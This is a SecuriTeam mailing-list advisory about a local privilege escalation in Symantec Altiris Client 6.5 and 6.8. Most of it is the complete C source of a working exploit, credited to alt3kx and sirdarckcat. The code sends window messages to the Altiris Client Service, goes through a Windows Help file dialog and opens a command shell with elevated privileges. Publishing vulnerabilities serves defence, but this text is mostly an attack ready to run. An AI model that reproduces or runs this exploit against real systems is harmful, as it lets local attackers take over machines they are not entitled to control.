[EXPL] Symantec Altiris Client Service Local Privilege Escalation (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Symantec Altiris Client Service Local Privilege Escalation (Exploit)
------------------------------------------------------------------------


SUMMARY

A local vulnerability in Altiris Client allows attackers to cause the
program to escalate the privileges of the attacker launching the below
exploit against it.

DETAILS

Vulnerable Systems:
* Altiris Client version 6.5.248
* Altiris Client version 6.5.299
* Altiris client version 6.8.378

Exploit:
// 0day PRIVATE NOT DISTRIBUTE!!!
//
// Symantec Altiris Client Service Local Exploit (0day)
//
// Affected Versions : Altiris Client 6.5.248
// Altiris Client 6.5.299
// Altiris client 6.8.378
//
// Alex Hernandez aka alt3kx
// ahernandez [at] sybsecurity.com
//
// Eduardo Vela aka sirdarckcat
// sirdarckcat [at] gmail.com
//
// We'll see you soon at ph-neutral 0x7d8

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
int id,a=0;
char langH[255][255];
char langO[255][255];
char wname[]="Altiris Client Service";

strcpy(langH[0x0c],"Aide de Windows");
strcpy(langH[0x09],"Windows Help");
strcpy(langH[0x0a],"Ayuda de Windows");

strcpy(langO[0x0c],"Ouvrir");
strcpy(langO[0x09],"Open");
strcpy(langO[0x0a],"Abrir");

printf("##########################################################\n");
printf("# Altiris Client Service #\n");
printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit #\n");
printf("# by sirdarckcat & alt3kx #\n");
printf("# #\n");
printf("# This exploit is based on www.milw0rm.com/exploits/350 #\n");
printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
printf("# by Cesar Cerrudo #\n");
printf("##########################################################\n\n");

id=PRIMARYLANGID(GetSystemDefaultLangID());
if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
printf("Lang not found, using english\n");
id=9;
}

char sText[]="%windir%\\system32\\cmd.ex?";

if (argc<2){
printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
printf("Look for your LANG-ID here:\n");
printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n";);
printf("\nAnyway, the program will try to guess it.\n\n");
return 0;
}else{
if (argc==2){
if (langH[atoi(argv[1])]){
id=atoi(argv[1]);
printf("Lang changed\n");
}else{
printf("Lang not supported\n",id);
}
}
}
printf("Using Lang %d\n",id);
printf("Looking for %s..\n",wname);
lHandle=FindWindow(NULL, wname);
if (!lHandle) {
printf("Window %s not found\n", wname);
return 0;
}else{
printf("Found! exploiting..\n");
}
PostMessage(lHandle,0x313,NULL,NULL);

Sleep(100);

SendMessage(lHandle,0x365,NULL,0x1);
Sleep(300);
pp:
if (!FindWindow(NULL, langH[id])){
printf("Help Window not found.. exploit unsuccesful\n");
if (id!=9){
printf("Trying with english..\n");
id=9;
goto pp;
}else{
return 0;
}
}else{
printf("Help Window found! exploiting..\n");
}
SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(500);
lHandle = FindWindow("#32770",langO[id]);
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);
printf("Sending path..\n");
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
lHandle2 = GetDlgItem(lHandle, 0x4A0);
printf("Looking for cmd..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
lHandle2 = GetDlgItem(lHandle2, 0x1);
printf("Sending keys..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
Sleep(500);
mark:
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);
Sleep(1000);
printf("Opening shell..\n");
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
Sleep(1000);
if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") &&
!FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
printf("Failed\n");
if (!a){
a++;
goto mark;
}
}else{
printf("Done!\n");
}
if(!a){
SendMessage (lHandle, WM_CLOSE,0,0);
Sleep(500);
SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
}else{
printf("The exploit failed, but maybe the context window of the shell
is visibile.\n");
}
return 0;
}


ADDITIONAL INFORMATION

The information has been provided by <mailto:ahernandez@xxxxxxxxxxxxxxx>
alt3kx.
The original article can be found at:
<http://www.milw0rm.com/exploits/5625>
http://www.milw0rm.com/exploits/5625



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.